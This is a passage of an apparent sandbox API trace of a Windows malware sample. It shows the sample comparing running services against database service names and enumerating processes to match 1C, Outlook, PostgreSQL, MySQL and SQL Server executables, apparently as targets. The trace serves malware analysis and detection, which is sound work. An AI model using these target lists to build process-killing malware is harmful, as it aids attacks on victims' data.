lpString2="RpcEptMapper") returned -1 [0031.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0031.794] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0031.794] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0031.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0031.794] lstrlenW (lpString="RpcSs") returned 5 [0031.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0031.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0031.794] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0031.794] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0031.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0031.794] lstrlenW (lpString="SamSs") returned 5 [0031.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0031.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0031.795] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0031.795] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0031.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0031.795] lstrlenW (lpString="Schedule") returned 8 [0031.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0031.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0031.795] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0031.795] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0031.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0031.795] lstrlenW (lpString="SENS") returned 4 [0031.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0031.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0031.795] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0031.795] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0031.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0031.795] lstrlenW (lpString="ShellHWDetection") returned 16 [0031.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0031.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0031.795] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0031.795] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0031.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0031.795] lstrlenW (lpString="Spooler") returned 7 [0031.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0031.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0031.795] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0031.795] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0031.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0031.795] lstrlenW (lpString="SysMain") returned 7 [0031.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0031.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0031.795] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0031.795] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0031.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0031.795] lstrlenW (lpString="Themes") returned 6 [0031.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0031.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0031.796] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0031.796] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0031.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0031.796] lstrlenW (lpString="TrkWks") returned 6 [0031.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0031.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0031.796] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0031.796] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0031.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0031.796] lstrlenW (lpString="UxSms") returned 5 [0031.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0031.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0031.796] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0031.796] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0031.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0031.796] lstrlenW (lpString="WdiServiceHost") returned 14 [0031.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0031.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0031.796] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0031.796] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0031.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0031.796] lstrlenW (lpString="WdiSystemHost") returned 13 [0031.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0031.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0031.796] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0031.796] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0031.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0031.796] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0031.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0031.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0031.796] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0031.796] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0031.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0031.796] lstrlenW (lpString="Winmgmt") returned 7 [0031.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0031.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0031.796] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0031.797] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0031.797] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0031.797] lstrlenW (lpString="WPDBusEnum") returned 10 [0031.797] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0031.797] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0031.797] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0031.797] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0031.797] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0031.797] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb91948 | out: hHeap=0xb10000) returned 1 [0031.797] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0031.800] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0031.801] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0031.801] lstrlenW (lpString="System") returned 6 [0031.801] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0031.801] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0031.801] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0031.801] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0031.801] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0031.802] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0031.802] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0031.802] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0031.802] lstrlenW (lpString="smss.exe") returned 8 [0031.802] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0031.802] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0031.802] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0031.802] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0031.802] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0031.802] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0031.802] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0031.802] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0031.803] lstrlenW (lpString="csrss.exe") returned 9 [0031.803] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0031.803] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0031.803] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0031.803] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0031.803] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0031.803] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0031.803] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0031.803] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0031.804] lstrlenW (lpString="wininit.exe") returned 11 [0031.804] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0031.804] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0031.804] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0031.804] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0031.804] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0031.804] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0031.804] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0031.804] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0031.804] lstrlenW (lpString="csrss.exe") returned 9 [0031.804] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0031.804] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0031.804] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0031.805] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0031.805] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0031.805] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0031.805] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0031.805] lstrlenW (lpString="winlogon.exe") returned 12 [0031.805] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0031.806] lstrlenW (lpString="services.exe") returned 12 [0031.806] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0031.806] lstrlenW (lpString="lsass.exe") returned 9 [0031.806] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0031.807] lstrlenW (lpString="lsm.exe") returned 7 [0031.807] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.807] lstrlenW (lpString="svchost.exe") returned 11 [0031.807] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.808] lstrlenW (lpString="svchost.exe") returned 11 [0031.808] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.809] lstrlenW (lpString="svchost.exe") returned 11 [0031.809] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.809] lstrlenW (lpString="svchost.exe") returned 11 [0031.809] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.810] lstrlenW (lpString="svchost.exe") returned 11 [0031.810] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0031.811] lstrlenW (lpString="audiodg.exe") returned 11 [0031.811] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.811] lstrlenW (lpString="svchost.exe") returned 11 [0031.811] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.812] lstrlenW (lpString="svchost.exe") returned 11 [0031.812] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0031.812] lstrlenW (lpString="dwm.exe") returned 7 [0031.812] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0031.813] lstrlenW (lpString="explorer.exe") returned 12 [0031.813] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0031.813] lstrlenW (lpString="spoolsv.exe") returned 11 [0031.813] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0031.814] lstrlenW (lpString="taskhost.exe") returned 12 [0031.814] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.814] lstrlenW (lpString="svchost.exe") returned 11 [0031.814] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0031.815] lstrlenW (lpString="taskeng.exe") returned 11 [0031.815] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0031.816] lstrlenW (lpString="taskhost.exe") returned 12 [0031.816] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0031.816] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0031.816] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0031.817] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0031.817] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0031.817] lstrlenW (lpString="sa_shape.exe") returned 12 [0031.817] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0031.818] lstrlenW (lpString="confidence.exe") returned 14 [0031.818] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0031.818] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0031.818] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0031.819] lstrlenW (lpString="blue.exe") returned 8 [0031.819] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0031.819] lstrlenW (lpString="newly debut.exe") returned 15 [0031.819] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0031.820] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0031.820] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0031.820] lstrlenW (lpString="archive.exe") returned 11 [0031.821] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0031.821] lstrlenW (lpString="defend.exe") returned 10 [0031.821] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0031.822] lstrlenW (lpString="arservice.exe") returned 13 [0031.822] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0031.822] lstrlenW (lpString="rr-programmer.exe") returned 17 [0031.822] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0031.823] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0031.823] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0031.823] lstrlenW (lpString="twistedmonton.exe") returned 17 [0031.823] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0031.824] lstrlenW (lpString="arc plains.exe") returned 14 [0031.824] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0031.824] lstrlenW (lpString="americahousestip.exe") returned 20 [0031.824] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0031.825] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0031.825] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0031.825] lstrlenW (lpString="medical lectures.exe") returned 20 [0031.826] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fae8 | out: lppe=0x18fae8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, 